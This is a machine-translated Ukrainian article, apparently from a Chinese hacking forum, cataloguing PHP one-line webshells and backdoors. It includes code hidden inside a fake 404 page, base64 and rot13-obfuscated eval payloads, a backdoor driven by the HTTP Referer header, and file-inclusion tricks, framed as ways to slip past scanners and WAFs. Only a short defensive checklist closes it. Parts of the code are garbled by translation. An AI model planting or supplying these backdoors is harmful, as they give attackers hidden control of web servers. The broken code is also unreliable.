Ми ставимося до цих PHP-бекдорів із менталітетом навчання, і багато PHP-бекдор-коду дозволяє нам бачити, наскільки добре намірлені програмісти.
Потужний PHP-бекдор в одному реченні
Такий бекдор дозволяє вебсайтам,Адміністратори серверів дуже складні і часто змушені змінювати методи для виконання різних виявлень, а багато нових методів написання не можна виявити та опрацювати звичайними методами виявлення.
Сьогодні ми розрахуємо кілька цікавих PHP-троянів.
1. Приховати PHP-поні, використовуючи 404 сторінки:
[mw_shl_code=php, true] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Не знайдено</title> </head><body> <h1>Не знайдено</h1> <p>Запитувана URL не була знайдена на цьому сервері.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?>[/mw_shl_code]
Сторінка 404 — це поширений файл на сайті, і мало хто перевірить і змінить його після того, як це зазвичай рекомендується, тож ми можемо використовувати це, щоб приховати бекдор.
2. Безликий прихований PHP в одному реченні:
[mw_shl_code=php,true]<?php session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a'); ?>[/mw_shl_code]
Призначте $_POST['code'] $_SESSION['theCode'], а потім виконайте $_SESSION['theCode'], при цьому виділено відсутність коду підпису.
Якщо ви використовуєте інструмент сканування для перевірки коду, він не спрацює і досягне мети.
3. Супер прихований PHP-бекдор:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?> [/mw_shl_code]
Функція GET сама по собі є трояном;
Як користуватися:
[mw_shl_code=php, true] ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Після виконання поточний каталог генерує c.php речення Trojan, коли параметр A оцінюється, генерація помилки Trojan не вдалася, і при затвердженні він також повідомляє про помилку, але генерує троянського коня, який не можна недооцінювати.
Запит рівня, код для запуску PHP backdoor:
Цей метод реалізовано з двома файлами, файлом 1
[mw_shl_code=php,true]<?php
//1.php header('Content-type:text/html; charset=UTF-8′); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10'&& count($a) == 9) { eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
} ?>[/mw_shl_code]
Документ 2
[mw_shl_code=php,true]<?php
//2.php header('Content-type:text/html; charset=UTF-8′);
//要执行的代码 $code= <<<КОД phpinfo(); CODE;
//进行base64编码 $code= base64_encode($code);
//构造referer字符串 $referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url $url= 'http://localhost/test1/1.php'; $ch= curl_init(); $options= масив( CURLOPT_URL => $url, CURLOPT_HEADER => ХИБНО, CURLOPT_RETURNTRANSFER => ПРАВДА, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echocurl_exec($ch); ?>[/mw_shl_code]
Запустіть код, закодований base64, через HTTP_REFERER у HTTP-запиті, щоб досягти ефекту бекдора.
Добре використовувати цю ідею, щоб обійти WAF.
4.PHP інструмент для генератора бекдорів Weevely
weevely — це спеціалізований для PHPБезкоштовне програмне забезпечення Webshell може використовуватися для імітації оболонки з'єднання, подібного до telnet. Weevely зазвичай використовується для експлуатації веб-програм, приховування бекдорів або використання методів, схожих на telnet замість керування веб-сторінками, серверний PHP-код, створений Weevely, кодується на base64, тому може обманювати основне антивірусне програмне забезпечення та IDS, Після завантаження серверного коду зазвичай можна запустити його безпосередньо через Weevely.
Функції, що використовуються в бекдорі, часто використовуються для обробки рядків, і такі функції, як eval і system, які використовуються як правила інспекції, не з'являються безпосередньо в коді, тому файл бекдора може обійти перевірку інструменту пошуку бекдора. Сканування за допомогою інструменту для виявлення бекдорів темної групи показує, що файл не загрожує жодній загрозі.
Вищенаведене — це загальне вступ, і відповідні методи використання тут не представлені, це проста популяризація науки.
4. Три деформовані однореченні PHP-трояни Перший:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?> [/mw_shl_code]
Друга
[mw_shl_code=php,true]<?php $_=“”; $_[+“”]=”; $_=“$_”.“”; $_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Напишіть http://site/2.php?_=assert&__=eval($_POST['pass']) пароль у кухонному ножі — це pass.
Якщо використовувати додаткові дані кухонного ножа, вони більш приховані, або можна використовувати інші інструменти для ін'єкцій, бо вони подані після публікації.
Третій
[mw_shl_code=php, true] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'додати'); [/mw_shl_code]
str_rot13 ('riny') — це закодована оцінка, яка повністю уникає ключових слів, не втрачаючи ефекту, змушуючи людей блювати кров'ю!
5. Нарешті, перелічіть кілька просунутих PHP-троянських бекдорів:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $hh("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid']; include($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); [/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= «p». r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $gzid("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST [mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Підсумовуючи, ці PHP-бекдори можна назвати завершеними, якщо ви не будете обережні, вас обов'язково обдурять, і який пріоритет нашої статті сьогодні? Ключові моменти наведені в підсумку нижче!
Як впоратися з однореченим бекдором PHP: Ми підкреслюємо кілька ключових моментів, і якщо ви читаєте цю статтю, я вважаю, що ви не непрофесіонал, тому не буду довго говорити:
- Будьте обережні з безпекою при написанні програм на PHP
- Файли логів сервера слід часто читати та регулярно робити резервні копії
- Суворе призначення дозволів для кожного об'єкта
- Часті пакетні перевірки безпеки динамічних файлів і каталогів
- Дізнайтеся, як проводити ручне дослідження антивірусу «Розслідування поведінкового судження та вбивство»
- Слідкуйте за оновленнями або проникайте в активний табір кібербезпеки
- Навіть функцію можна використовувати як правило для ієрархічної обробки серверного середовища
Ми вважаємо, що коли з'являється більше сайтів для управління і велика кількість даних, слід розумно застосовувати допоміжні інструменти, але не варто повністю покладатися на них, технології постійно оновлюються і вдосконалюються, найважливіше — щоб ви навчилися і розуміли ідею написання цих потужних бекдорів, і ця трансформація ролі може принести вам більший прогрес.
|